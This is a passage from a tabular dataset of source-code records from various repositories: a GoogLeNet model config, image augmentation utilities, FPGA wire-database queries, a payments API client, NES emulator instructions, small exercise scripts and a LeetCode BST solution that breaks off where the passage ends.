max_stars_repo_path (stringlengths 3-269) | max_stars_repo_name (stringlengths 4-119) | max_stars_count (int64 0-191k) | id (stringlengths 1-7) | content (stringlengths 6-1.05M) | score (float64 0.23-5.13) | int_score (int64 0-5)
---|---|---|---|---|---|---|
examples/source/benchmarks/googlenet_model.py | ably77/dcos-tensorflow-tools | 7 | 7800 | <reponame>ably77/dcos-tensorflow-tools
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Googlenet model configuration.
References:
Szegedy, Christian, <NAME>, <NAME>, <NAME>, <NAME>,
<NAME>, <NAME>, <NAME>, and <NAME>
Going deeper with convolutions
arXiv preprint arXiv:1409.4842 (2014)
"""
import model
class GooglenetModel(model.Model):
def __init__(self):
super(GooglenetModel, self).__init__('googlenet', 224, 32, 0.005)
def add_inference(self, cnn):
def inception_v1(cnn, k, l, m, n, p, q):
cols = [[('conv', k, 1, 1)], [('conv', l, 1, 1), ('conv', m, 3, 3)],
[('conv', n, 1, 1), ('conv', p, 5, 5)],
[('mpool', 3, 3, 1, 1, 'SAME'), ('conv', q, 1, 1)]]
cnn.inception_module('incept_v1', cols)
cnn.conv(64, 7, 7, 2, 2)
cnn.mpool(3, 3, 2, 2, mode='SAME')
cnn.conv(64, 1, 1)
cnn.conv(192, 3, 3)
cnn.mpool(3, 3, 2, 2, mode='SAME')
inception_v1(cnn, 64, 96, 128, 16, 32, 32)
inception_v1(cnn, 128, 128, 192, 32, 96, 64)
cnn.mpool(3, 3, 2, 2, mode='SAME')
inception_v1(cnn, 192, 96, 208, 16, 48, 64)
inception_v1(cnn, 160, 112, 224, 24, 64, 64)
inception_v1(cnn, 128, 128, 256, 24, 64, 64)
inception_v1(cnn, 112, 144, 288, 32, 64, 64)
inception_v1(cnn, 256, 160, 320, 32, 128, 128)
cnn.mpool(3, 3, 2, 2, mode='SAME')
inception_v1(cnn, 256, 160, 320, 32, 128, 128)
inception_v1(cnn, 384, 192, 384, 48, 128, 128)
cnn.apool(7, 7, 1, 1, mode='VALID')
cnn.reshape([-1, 1024])
| 1.890625 | 2 |
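The inception_v1 helper above describes the four parallel GoogLeNet branches (a 1x1 convolution, a 1x1-then-3x3 pair, a 1x1-then-5x5 pair, and a 3x3 max-pool followed by a 1x1 projection) that inception_module concatenates along the channel axis. A minimal sketch, assuming only that depth-wise concatenation, of how the column spec determines a module's output depth:

```python
def inception_output_depth(k, l, m, n, p, q):
    # Branches that reach the concat: 1x1 conv (k), 3x3 conv (m), 5x5 conv (p), pool projection (q).
    # l and n are the 1x1 reduction widths feeding the 3x3 and 5x5 branches, so they do not
    # contribute to the concatenated depth.
    return k + m + p + q

print(inception_output_depth(64, 96, 128, 16, 32, 32))    # 256, first module above
print(inception_output_depth(128, 128, 192, 32, 96, 64))  # 480, second module above
```

The 256 and 480 values match the output depths usually quoted for GoogLeNet's inception (3a) and (3b) blocks.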
demos/prey-predator/prey_predator_abm/sim_params.py | neo-empresarial/covid-19 | 3 | 7801 | """
Simulation parameters.
"""
SIMULATION_TIME_STEPS = 300
| 0.964844 | 1 |
process_ops.py | gcosne/generative_inpainting | 11 | 7802 | <reponame>gcosne/generative_inpainting
import cv2
import numpy as np
try:
import scipy
# scipy.ndimage cannot be accessed until explicitly imported
from scipy import ndimage
except ImportError:
scipy = None
def flip_axis(x, axis):
x = np.asarray(x).swapaxes(axis, 0)
x = x[::-1, ...]
x = x.swapaxes(0, axis)
return x
def random_rotation(x, rg, row_axis=0, col_axis=1, channel_axis=2,
fill_mode='nearest', cval=0., interpolation_order=1):
"""Performs a random rotation of a Numpy image tensor.
# Arguments
x: Input tensor. Must be 3D.
rg: Rotation range, in degrees.
row_axis: Index of axis for rows in the input tensor.
col_axis: Index of axis for columns in the input tensor.
channel_axis: Index of axis for channels in the input tensor.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
interpolation_order int: order of spline interpolation.
see `ndimage.interpolation.affine_transform`
# Returns
Rotated Numpy image tensor.
"""
theta = np.random.uniform(-rg, rg)
x = apply_affine_transform(x, theta=theta, channel_axis=channel_axis,
fill_mode=fill_mode, cval=cval,
order=interpolation_order)
return x
def random_shift(x, wrg, hrg, row_axis=0, col_axis=1, channel_axis=2,
fill_mode='nearest', cval=0., interpolation_order=1):
"""Performs a random spatial shift of a Numpy image tensor.
# Arguments
x: Input tensor. Must be 3D.
wrg: Width shift range, as a float fraction of the width.
hrg: Height shift range, as a float fraction of the height.
row_axis: Index of axis for rows in the input tensor.
col_axis: Index of axis for columns in the input tensor.
channel_axis: Index of axis for channels in the input tensor.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
interpolation_order int: order of spline interpolation.
see `ndimage.interpolation.affine_transform`
# Returns
Shifted Numpy image tensor.
"""
h, w = x.shape[row_axis], x.shape[col_axis]
tx = np.random.uniform(-hrg, hrg) * h
ty = np.random.uniform(-wrg, wrg) * w
x = apply_affine_transform(x, tx=tx, ty=ty, channel_axis=channel_axis,
fill_mode=fill_mode, cval=cval,
order=interpolation_order)
return x
def random_shear(x, intensity, row_axis=0, col_axis=1, channel_axis=2,
fill_mode='nearest', cval=0., interpolation_order=1):
"""Performs a random spatial shear of a Numpy image tensor.
# Arguments
x: Input tensor. Must be 3D.
intensity: Transformation intensity in degrees.
row_axis: Index of axis for rows in the input tensor.
col_axis: Index of axis for columns in the input tensor.
channel_axis: Index of axis for channels in the input tensor.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
interpolation_order int: order of spline interpolation.
see `ndimage.interpolation.affine_transform`
# Returns
Sheared Numpy image tensor.
"""
shear = np.random.uniform(-intensity, intensity)
x = apply_affine_transform(x, shear=shear, channel_axis=channel_axis,
fill_mode=fill_mode, cval=cval,
order=interpolation_order)
return x
def random_zoom(x, zoom_range, row_axis=0, col_axis=1, channel_axis=2,
fill_mode='nearest', cval=0., interpolation_order=1):
"""Performs a random spatial zoom of a Numpy image tensor.
# Arguments
x: Input tensor. Must be 3D.
zoom_range: Tuple of floats; zoom range for width and height.
row_axis: Index of axis for rows in the input tensor.
col_axis: Index of axis for columns in the input tensor.
channel_axis: Index of axis for channels in the input tensor.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
interpolation_order int: order of spline interpolation.
see `ndimage.interpolation.affine_transform`
# Returns
Zoomed Numpy image tensor.
# Raises
ValueError: if `zoom_range` isn't a tuple.
"""
if len(zoom_range) != 2:
raise ValueError('`zoom_range` should be a tuple or list of two'
' floats. Received: %s' % (zoom_range,))
if zoom_range[0] == 1 and zoom_range[1] == 1:
zx, zy = 1, 1
else:
zx, zy = np.random.uniform(zoom_range[0], zoom_range[1], 2)
x = apply_affine_transform(x, zx=zx, zy=zy, channel_axis=channel_axis,
fill_mode=fill_mode, cval=cval,
order=interpolation_order)
return x
def random_channel_shift(x, intensity, channel_axis=0):
x = np.rollaxis(x, channel_axis, 0)
min_x, max_x = np.min(x), np.max(x)
channel_images = [np.clip(x_channel + np.random.uniform(-intensity, intensity), min_x, max_x)
for x_channel in x]
x = np.stack(channel_images, axis=0)
x = np.rollaxis(x, 0, channel_axis + 1)
return x
# For curving soybean pods. L.C.Uzal
def random_curves_transform(x, strength=0.1, range=(0.,255.)):
low, high = range
delta = (high - low) * strength / 2.
xp = np.random.uniform(low=low + delta, high=high - delta)
yp = np.random.uniform(low=xp-delta, high=xp+delta)
xp = np.asarray([low, xp, high])
yp = np.asarray([low, yp, high])
return np.interp(x,xp,yp)
def transform_matrix_offset_center(matrix, x, y):
o_x = float(x) / 2 + 0.5
o_y = float(y) / 2 + 0.5
offset_matrix = np.array([[1, 0, o_x], [0, 1, o_y], [0, 0, 1]])
reset_matrix = np.array([[1, 0, -o_x], [0, 1, -o_y], [0, 0, 1]])
transform_matrix = np.dot(np.dot(offset_matrix, matrix), reset_matrix)
return transform_matrix
def apply_affine_transform(x, theta=0, tx=0, ty=0, shear=0, zx=1, zy=1,
row_axis=0, col_axis=1, channel_axis=2,
fill_mode='nearest', cval=0., order=1):
"""Applies an affine transformation specified by the parameters given.
# Arguments
x: 2D numpy array, single image.
theta: Rotation angle in degrees.
tx: Width shift.
        ty: Height shift.
shear: Shear angle in degrees.
zx: Zoom in x direction.
zy: Zoom in y direction
row_axis: Index of axis for rows in the input image.
col_axis: Index of axis for columns in the input image.
channel_axis: Index of axis for channels in the input image.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
order int: order of interpolation
# Returns
The transformed version of the input.
"""
if scipy is None:
raise ImportError('Image transformations require SciPy. '
'Install SciPy.')
transform_matrix = None
if theta != 0:
theta = np.deg2rad(theta)
rotation_matrix = np.array([[np.cos(theta), -np.sin(theta), 0],
[np.sin(theta), np.cos(theta), 0],
[0, 0, 1]])
transform_matrix = rotation_matrix
if tx != 0 or ty != 0:
shift_matrix = np.array([[1, 0, tx],
[0, 1, ty],
[0, 0, 1]])
if transform_matrix is None:
transform_matrix = shift_matrix
else:
transform_matrix = np.dot(transform_matrix, shift_matrix)
if shear != 0:
shear = np.deg2rad(shear)
shear_matrix = np.array([[1, -np.sin(shear), 0],
[0, np.cos(shear), 0],
[0, 0, 1]])
if transform_matrix is None:
transform_matrix = shear_matrix
else:
transform_matrix = np.dot(transform_matrix, shear_matrix)
if zx != 1 or zy != 1:
zoom_matrix = np.array([[zx, 0, 0],
[0, zy, 0],
[0, 0, 1]])
if transform_matrix is None:
transform_matrix = zoom_matrix
else:
transform_matrix = np.dot(transform_matrix, zoom_matrix)
if transform_matrix is not None:
h, w = x.shape[row_axis], x.shape[col_axis]
transform_matrix = transform_matrix_offset_center(
transform_matrix, h, w)
x = np.rollaxis(x, channel_axis, 0)
final_affine_matrix = transform_matrix[:2, :2]
final_offset = transform_matrix[:2, 2]
channel_images = [ndimage.interpolation.affine_transform(
x_channel,
final_affine_matrix,
final_offset,
order=order,
mode=fill_mode,
cval=cval) for x_channel in x]
x = np.stack(channel_images, axis=0)
x = np.rollaxis(x, 0, channel_axis + 1)
return x
def random_transform(x, rotation_range=0,
width_shift_range=0.,
height_shift_range=0.,
shear_range=0.,
zoom_range=0.,
channel_shift_range=0.,
horizontal_flip=False,
vertical_flip=False,
random_curves_strength=0.):
# Generate params
if rotation_range:
theta = np.random.uniform(-rotation_range, rotation_range)
else:
theta = 0
h, w = x.shape[0], x.shape[1]
if height_shift_range:
tx = np.random.uniform(-height_shift_range, height_shift_range) * h
else:
tx = 0
if width_shift_range:
ty = np.random.uniform(-width_shift_range, width_shift_range) * w
else:
ty = 0
if shear_range:
shear = np.random.uniform(-shear_range, shear_range)
else:
shear = 0
if np.isscalar(zoom_range):
zoom_range = [1 - zoom_range, 1 + zoom_range]
elif len(zoom_range) == 2:
zoom_range = [zoom_range[0], zoom_range[1]]
else:
raise ValueError('`zoom_range` should be a float or '
'a tuple or list of two floats. '
'Received arg: ', zoom_range)
if zoom_range[0] == 1 and zoom_range[1] == 1:
zx, zy = 1, 1
else:
zx, zy = np.random.uniform(zoom_range[0], zoom_range[1], 2)
# Apply transforms
x = apply_affine_transform(x,
theta,
tx, ty,
shear,
zx, zy)
if channel_shift_range != 0:
x = random_channel_shift(x, channel_shift_range, 2)
if horizontal_flip:
if np.random.random() < 0.5:
x = flip_axis(x, 1)
if vertical_flip:
if np.random.random() < 0.5:
x = flip_axis(x, 0)
if random_curves_strength > 0.:
x = random_curves_transform(x, random_curves_strength)
return x
if __name__ == "__main__":
import argparse
from PIL import Image
parser = argparse.ArgumentParser()
parser.add_argument('--image', default='', type=str)
parser.add_argument('--imageOut', default='result.png', type=str)
args = parser.parse_args()
im = np.array(Image.open(args.image))
img = random_transform(im, rotation_range=10, shear_range=.5, zoom_range=.2, channel_shift_range=10., horizontal_flip=True)
Image.fromarray(np.uint8(img)).save(args.imageOut)
| 2.59375 | 3 |
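apply_affine_transform above composes rotation, shift, shear, and zoom as 3x3 homogeneous matrices and recenters the product with transform_matrix_offset_center, so the transform pivots around the image center rather than the top-left corner. A minimal NumPy sketch, using a hypothetical 11x11 image, checking that the center is a fixed point of a recentered rotation:

```python
import numpy as np

def offset_center(matrix, x, y):
    # Same construction as transform_matrix_offset_center above: T(center) @ M @ T(-center)
    o_x, o_y = float(x) / 2 + 0.5, float(y) / 2 + 0.5
    offset = np.array([[1, 0, o_x], [0, 1, o_y], [0, 0, 1]])
    reset = np.array([[1, 0, -o_x], [0, 1, -o_y], [0, 0, 1]])
    return offset @ matrix @ reset

theta = np.deg2rad(30)
rotation = np.array([[np.cos(theta), -np.sin(theta), 0],
                     [np.sin(theta),  np.cos(theta), 0],
                     [0,              0,             1]])
m = offset_center(rotation, 11, 11)
center = np.array([11 / 2 + 0.5, 11 / 2 + 0.5, 1.0])
print(np.allclose(m @ center, center))  # True: the image center does not move
```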
keystone/tests/unit/token/test_provider.py | maestro-hybrid-cloud/keystone | 0 | 7803 | <filename>keystone/tests/unit/token/test_provider.py
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
from six.moves import urllib
from keystone.tests import unit
from keystone.token import provider
class TestRandomStrings(unit.BaseTestCase):
def test_strings_are_url_safe(self):
s = provider.random_urlsafe_str()
self.assertEqual(s, urllib.parse.quote_plus(s))
def test_strings_can_be_converted_to_bytes(self):
s = provider.random_urlsafe_str()
self.assertTrue(isinstance(s, six.string_types))
b = provider.random_urlsafe_str_to_bytes(s)
self.assertTrue(isinstance(b, bytes))
| 2.046875 | 2 |
fasm2bels/database/connection_db_utils.py | mithro/symbiflow-xc-fasm2bels | 0 | 7804 | import functools
def create_maybe_get_wire(conn):
c = conn.cursor()
@functools.lru_cache(maxsize=None)
def get_tile_type_pkey(tile):
c.execute('SELECT pkey, tile_type_pkey FROM phy_tile WHERE name = ?',
(tile, ))
return c.fetchone()
@functools.lru_cache(maxsize=None)
def maybe_get_wire(tile, wire):
phy_tile_pkey, tile_type_pkey = get_tile_type_pkey(tile)
c.execute(
'SELECT pkey FROM wire_in_tile WHERE phy_tile_type_pkey = ? and name = ?',
(tile_type_pkey, wire))
result = c.fetchone()
if result is None:
return None
wire_in_tile_pkey = result[0]
c.execute(
'SELECT pkey FROM wire WHERE phy_tile_pkey = ? AND wire_in_tile_pkey = ?',
(phy_tile_pkey, wire_in_tile_pkey))
return c.fetchone()[0]
return maybe_get_wire
def maybe_add_pip(top, maybe_get_wire, feature):
if feature.value != 1:
return
parts = feature.feature.split('.')
assert len(parts) == 3
sink_wire = maybe_get_wire(parts[0], parts[2])
if sink_wire is None:
return
src_wire = maybe_get_wire(parts[0], parts[1])
if src_wire is None:
return
top.active_pips.add((sink_wire, src_wire))
def get_node_pkey(conn, wire_pkey):
c = conn.cursor()
c.execute("SELECT node_pkey FROM wire WHERE pkey = ?", (wire_pkey, ))
return c.fetchone()[0]
def get_wires_in_node(conn, node_pkey):
c = conn.cursor()
c.execute("SELECT pkey FROM wire WHERE node_pkey = ?", (node_pkey, ))
for row in c.fetchall():
yield row[0]
def get_wire(conn, phy_tile_pkey, wire_in_tile_pkey):
c = conn.cursor()
c.execute(
"SELECT pkey FROM wire WHERE wire_in_tile_pkey = ? AND phy_tile_pkey = ?;",
(
wire_in_tile_pkey,
phy_tile_pkey,
))
return c.fetchone()[0]
def get_tile_type(conn, tile_name):
c = conn.cursor()
c.execute(
"""
SELECT name FROM tile_type WHERE pkey = (
SELECT tile_type_pkey FROM phy_tile WHERE name = ?);""", (tile_name, ))
return c.fetchone()[0]
def get_wire_pkey(conn, tile_name, wire):
c = conn.cursor()
c.execute(
"""
WITH selected_tile(phy_tile_pkey, tile_type_pkey) AS (
SELECT
pkey,
tile_type_pkey
FROM
phy_tile
WHERE
name = ?
)
SELECT
wire.pkey
FROM
wire
WHERE
wire.phy_tile_pkey = (
SELECT
selected_tile.phy_tile_pkey
FROM
selected_tile
)
AND wire.wire_in_tile_pkey = (
SELECT
wire_in_tile.pkey
FROM
wire_in_tile
WHERE
wire_in_tile.name = ?
AND wire_in_tile.phy_tile_type_pkey = (
SELECT
tile_type_pkey
FROM
selected_tile
)
);
""", (tile_name, wire))
results = c.fetchone()
assert results is not None, (tile_name, wire)
return results[0]
| 2.28125 | 2 |
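The helpers above assume a SQLite connection to a database exposing phy_tile, tile_type, wire_in_tile, and wire tables. A minimal usage sketch; the database filename and the tile and wire names are hypothetical:

```python
import sqlite3

conn = sqlite3.connect("channels.db")  # hypothetical database file
maybe_get_wire = create_maybe_get_wire(conn)

wire_pkey = maybe_get_wire("CLBLL_L_X2Y3", "CLBLL_L_A")  # hypothetical tile / wire names
if wire_pkey is not None:
    node_pkey = get_node_pkey(conn, wire_pkey)
    wires_in_same_node = list(get_wires_in_node(conn, node_pkey))
    tile_type = get_tile_type(conn, "CLBLL_L_X2Y3")
```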
ppr-api/src/services/payment_service.py | bcgov/ppr-deprecated | 1 | 7805 | """A module that provides functionality for accessing the Payments API."""
import enum
import http
import logging
import requests
from fastapi import Depends, Header, HTTPException
from fastapi.security.http import HTTPAuthorizationCredentials
import auth.authentication
import config
import schemas.payment
logger = logging.getLogger(__name__)
CORP_TYPE = 'PPR'
class FilingCode(enum.Enum):
"""An enumeration of the filing codes available to PPR."""
SEARCH = 'SERCH'
YEARLY_REGISTRATION = 'FSREG'
INFINITE_REGISTRATION = 'INFRG'
class PaymentService:
"""A service used for interacting with the Payments API."""
auth_header: HTTPAuthorizationCredentials
account_id: str
def __init__(self, auth_header: HTTPAuthorizationCredentials = Depends(auth.authentication.bearer_scheme),
account_id: str = Header(None)):
"""Initialize the repository with the Authorization and Account-Id headers provided in the request."""
self.auth_header = auth_header
self.account_id = account_id
def create_payment(self, filing_code: FilingCode):
"""Submit a payment request and provide the details to the caller."""
request = {
'businessInfo': {'corpType': CORP_TYPE},
'filingInfo': {'filingTypes': [{'filingTypeCode': filing_code.value}]}
}
pay_response = requests.post(
'{}/payment-requests'.format(config.PAY_API_URL), json=request,
headers={
'Authorization': '{} {}'.format(self.auth_header.scheme, self.auth_header.credentials),
'Account-Id': self.account_id
}
)
try:
auth.authentication.check_auth_response(pay_response)
except HTTPException as auth_ex:
logger.error('Create Payment call failed auth with status {}. Response body: {}'.format(
pay_response.status_code, pay_response.text))
raise auth_ex
if not pay_response: # status_code is unsuccessful
logger.error('Create Payment call failed unexpectedly with status {}. Response body: {}'.format(
pay_response.status_code, pay_response.text))
raise HTTPException(status_code=http.HTTPStatus.INTERNAL_SERVER_ERROR)
body = pay_response.json()
return schemas.payment.Payment(id=body['id'], status=body['statusCode'], method=body['paymentMethod'])
| 3.125 | 3 |
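Because PaymentService resolves its Authorization and Account-Id headers through FastAPI's dependency injection, a route can receive a ready instance via Depends. A minimal sketch of such a route; the router, path, and response handling are hypothetical:

```python
from fastapi import APIRouter, Depends

router = APIRouter()

@router.post("/searches")
def create_search(payment_service: PaymentService = Depends()):
    # Charge the PPR search filing code and return the resulting payment record.
    return payment_service.create_payment(FilingCode.SEARCH)
```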
SmerekaRoman/HW_6/HW 6.3.py | kolyasalubov/Lv-639.pythonCore | 0 | 7806 | <reponame>kolyasalubov/Lv-639.pythonCore
def numb_of_char(a):
d = {}
for char in set(a):
d[char] = a.count(char)
return d
a = numb_of_char(str(input("Input the word please: ")))
print(a)
| 3.5625 | 4 |
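numb_of_char counts each distinct character once with str.count, so for example:

```python
assert numb_of_char("banana") == {"b": 1, "a": 3, "n": 2}
```

The standard-library collections.Counter("banana") yields the same counts in a single pass over the string.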
0201-0300/0251-Flatten 2D Vector/0251-Flatten 2D Vector.py | jiadaizhao/LeetCode | 49 | 7807 | <reponame>jiadaizhao/LeetCode
from typing import List
class Vector2D:
def __init__(self, v: List[List[int]]):
def getIt():
for row in v:
for val in row:
yield val
self.it = iter(getIt())
self.val = next(self.it, None)
def next(self) -> int:
result = self.val
self.val = next(self.it, None)
return result
def hasNext(self) -> bool:
return self.val is not None
# Your Vector2D object will be instantiated and called as such:
# obj = Vector2D(v)
# param_1 = obj.next()
# param_2 = obj.hasNext()
| 3.40625 | 3 |
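A short usage sketch of the iterator above; empty inner rows are skipped transparently because the generator only yields actual values:

```python
v = Vector2D([[1, 2], [3], [], [4]])
flattened = []
while v.hasNext():
    flattened.append(v.next())
print(flattened)  # [1, 2, 3, 4]
```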
logger_decorator.py | jbhayback/reconciliation-manager | 0 | 7808 | from datetime import datetime
import inspect
import logging
logger = logging.getLogger(__name__)
def log_time(msg=None):
def decorator(f):
nonlocal msg
if msg is None:
msg = '{} time spent: '.format(f.__name__)
def inner(*args, **kwargs):
# check if the object has a logger
global logger
if args and hasattr(args[0], 'logger'):
logger = args[0].logger
start = datetime.now()
result = f(*args, **kwargs)
logger.info(
msg + ' {} seconds'.format((datetime.now() - start).total_seconds())
)
return result
return inner
return decorator
def log_params(f):
    arg_spec = inspect.getfullargspec(f).args
has_self = arg_spec and arg_spec[0] == 'self'
def decorator(*args, **kwargs):
logger.info(
'calling {} with args: {}, and kwargs: {}'.format(
f.__name__, args if not has_self else args[1:], kwargs
)
)
return f(*args, **kwargs)
return decorator
| 2.9375 | 3 |
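A minimal usage sketch of the two decorators above; the ReportBuilder class is hypothetical, and the logged output assumes logging.basicConfig has been called and the module-level logger exists:

```python
import logging
logging.basicConfig(level=logging.INFO)

class ReportBuilder:
    def __init__(self):
        # log_time prefers this instance logger when one is present
        self.logger = logging.getLogger("report")

    @log_time("build time spent:")
    @log_params
    def build(self, rows, fmt="csv"):
        return len(rows)

ReportBuilder().build([1, 2, 3], fmt="json")
# logs roughly: "calling build with args: ([1, 2, 3],), and kwargs: {'fmt': 'json'}"
# then:         "build time spent: 0.0001 seconds"
```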
lf3py/di/__init__.py | rog-works/lf3py | 0 | 7809 | <gh_stars>0
from lf3py.di.di import DI # noqa F401
| 1.109375 | 1 |
critical/tasks.py | lenarother/django-critical-css | 2 | 7810 | <reponame>lenarother/django-critical-css
import logging
from django.utils.safestring import mark_safe
from django_rq import job
from inline_static.css import transform_css_urls
logger = logging.getLogger(__name__)
@job
def calculate_critical_css(critical_id, original_path):
from .exceptions import CriticalException
from .models import Critical
from .services import calculate_critical_css as service_calculate
logger.info('Task: critical css with id {0} requested.'.format(critical_id))
critical = Critical.objects.filter(id=critical_id).first()
if not critical:
raise CriticalException('There is no Critical object with id {0}'.format(critical_id))
logger.info('Task: {0}, {1}'.format(critical.url, critical.path))
critical.is_pending = True
critical.save(update_fields=['is_pending'])
logger.info('Task: critical css with id {0} pending.'.format(critical_id))
try:
critical_css_raw = service_calculate(critical.url, critical.path)
critical_css = transform_css_urls(original_path, critical.path, critical_css_raw)
except Exception as exc:
critical.is_pending = False
critical.save(update_fields=['is_pending'])
raise CriticalException('Could not calculate critical css') from exc
critical.css = mark_safe(critical_css)
critical.is_pending = False
critical.save()
logger.info('Task: critical css with id {0} saved.'.format(critical_id))
| 1.921875 | 2 |
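Since calculate_critical_css is registered through django_rq's @job decorator, callers normally enqueue it rather than calling it inline; a minimal sketch with a hypothetical call site and path:

```python
# e.g. from a view or a post_save signal handler (hypothetical)
calculate_critical_css.delay(critical.id, "/srv/static/css/site.css")
```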
test.py | wei2912/bce-simulation | 0 | 7811 | <filename>test.py<gh_stars>0
#!/usr/bin/env python
# coding=utf-8
"""
This script tests the simulations of the experiments.
"""
import math
from utils import coin_var, needle_var
def main():
needle_var_vals = [
(1.1, 1.0),
(1.4, 1.0),
(2.0, 1.0),
(2.9, 1.0),
(3.3, 1.0),
(5.0, 1.0)
]
print("needle_var:")
for L, D in needle_var_vals:
trials = 1000000
pred_prob = needle_var.predict_prob(length=L, gap_width=D)
pred_hits = pred_prob * trials
hits = needle_var.run_trials(length=L, gap_width=D, trials=trials)
if pred_hits == 0 or pred_hits == trials:
stat = float('nan')
else:
stat = sum([
(hits - pred_hits) ** 2 / pred_hits,
((trials - hits) - (trials - pred_hits)) ** 2 / (trials-pred_hits)
])
print("L = {}, D = {}, expected = {}, observed = {}, stat = {}".format(L, D, pred_hits, hits, stat))
print("coin_var:")
coin_var_vals = [
(1.0, 1.0),
(1.0, 1.2),
(1.0, math.sqrt(2)),
(1.0, 1.5),
(1.0, 1.8),
(1.0, 1.9),
(1.0, 2.0),
(1.0, 3.0),
(1.0, 5.0)
]
for R, D in coin_var_vals:
trials = 100000
pred_prob = coin_var.predict_prob(diameter=2*R, gap_width=D)
pred_hits = pred_prob * trials
hits = coin_var.run_trials(diameter=2*R, gap_width=D, trials=trials)
if pred_hits == 0 or pred_hits == trials:
stat = float('nan')
else:
stat = sum([
(hits - pred_hits) ** 2 / pred_hits,
((trials - hits) - (trials - pred_hits)) ** 2 / (trials-pred_hits)
])
print("R = {}, D = {}, expected = {}, observed = {}, stat = {}".format(R, D, pred_hits, hits, stat))
main()
| 2.75 | 3 |
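The stat accumulated in both loops above is a Pearson chi-squared statistic with one degree of freedom over the two outcomes, hit and miss, using the predicted hit count as the expected value:

```latex
\chi^2 = \frac{(O - E)^2}{E} + \frac{\bigl((N - O) - (N - E)\bigr)^2}{N - E},
\qquad O = \text{hits}, \; E = \text{pred\_hits}, \; N = \text{trials}
```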
instructions/instructions.py | fernandozanutto/PyNES | 0 | 7812 | <reponame>fernandozanutto/PyNES
from addressing import *
from instructions.base_instructions import SetBit, ClearBit
from instructions.generic_instructions import Instruction
from status import Status
# set status instructions
class Sec(SetBit):
identifier_byte = bytes([0x38])
bit = Status.StatusTypes.carry
class Sei(SetBit):
identifier_byte = bytes([0x78])
bit = Status.StatusTypes.interrupt
class Sed(SetBit):
identifier_byte = bytes([0xF8])
bit = Status.StatusTypes.decimal
# clear status instructions
class Cld(ClearBit):
identifier_byte = bytes([0xD8])
bit = Status.StatusTypes.decimal
class Clc(ClearBit):
identifier_byte = bytes([0x18])
bit = Status.StatusTypes.carry
class Clv(ClearBit):
identifier_byte = bytes([0xB8])
bit = Status.StatusTypes.overflow
class Cli(ClearBit):
identifier_byte = bytes([0x58])
bit = Status.StatusTypes.interrupt
class Bit(Instruction):
@classmethod
def get_data(cls, cpu, memory_address, data_bytes) -> Optional[int]:
return cpu.bus.read_memory(memory_address)
@classmethod
def apply_side_effects(cls, cpu, memory_address, value):
and_result = cpu.a_reg & value
cpu.status_reg.bits[Status.StatusTypes.zero] = not and_result
cpu.status_reg.bits[Status.StatusTypes.overflow] = (
value & (1 << 6)) > 0
cpu.status_reg.bits[Status.StatusTypes.negative] = (
value & (1 << 7)) > 0
class BitZeroPage(ZeroPageAddressing, Bit):
identifier_byte = bytes([0x24])
class BitAbsolute(AbsoluteAddressing, Bit):
identifier_byte = bytes([0x2C])
class Brk(ImplicitAddressing, Instruction):
identifier_byte = bytes([0x00])
@classmethod
def get_data(cls, cpu, memory_address, data_bytes) -> Optional[int]:
return super().get_data(cpu, memory_address, data_bytes)
@classmethod
def write(cls, cpu, memory_address, value):
cpu.push_to_stack(cpu.pc_reg + 1, 2)
cpu.push_to_stack(cpu.status_reg.to_int() | (1 << 4), 1)
@classmethod
def apply_side_effects(cls, cpu, memory_address, value):
cpu.status_reg.bits[Status.StatusTypes.interrupt] = 1
cpu.running = False
@classmethod
def get_cycles(cls):
return 7
| 2.71875 | 3 |
python/530.minimum-absolute-difference-in-bst.py | vermouth1992/Leetcode | 0 | 7813 | #
# @lc app=leetcode id=530 lang=python3
#
# [530] Minimum Absolute Difference in BST
#
# https://leetcode.com/problems/minimum-absolute-difference-in-bst/description/
#
# algorithms
# Easy (55.23%)
# Total Accepted: 115.5K
# Total Submissions: 209K
# Testcase Example: '[4,2,6,1,3]'
#
# Given the root of a Binary Search Tree (BST), return the minimum absolute
# difference between the values of any two different nodes in the tree.
#
#
# Example 1:
#
#
# Input: root = [4,2,6,1,3]
# Output: 1
#
#
# Example 2:
#
#
# Input: root = [1,0,48,null,null,12,49]
# Output: 1
#
#
#
# Constraints:
#
#
# The number of nodes in the tree is in the range [2, 10^4].
# 0 <= Node.val <= 10^5
#
#
#
# Note: This question is the same as 783:
# https://leetcode.com/problems/minimum-distance-between-bst-nodes/
#
#
# Definition for a binary tree node.
from typing import List
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def getNodeValues(self, root: TreeNode) -> List[int]:
value = []
self.getNodeValuesHelper(root, value)
return value
def getNodeValuesHelper(self, root: TreeNode, value: List[int]):
if root is None:
return
value.append(root.val)
self.getNodeValuesHelper(root.left, value)
self.getNodeValuesHelper(root.right, value)
def getMinimumDifference(self, root: TreeNode) -> int:
# get all the values and put into a list O(n)
value = self.getNodeValues(root)
# sort the list O(nlogn)
value = sorted(value)
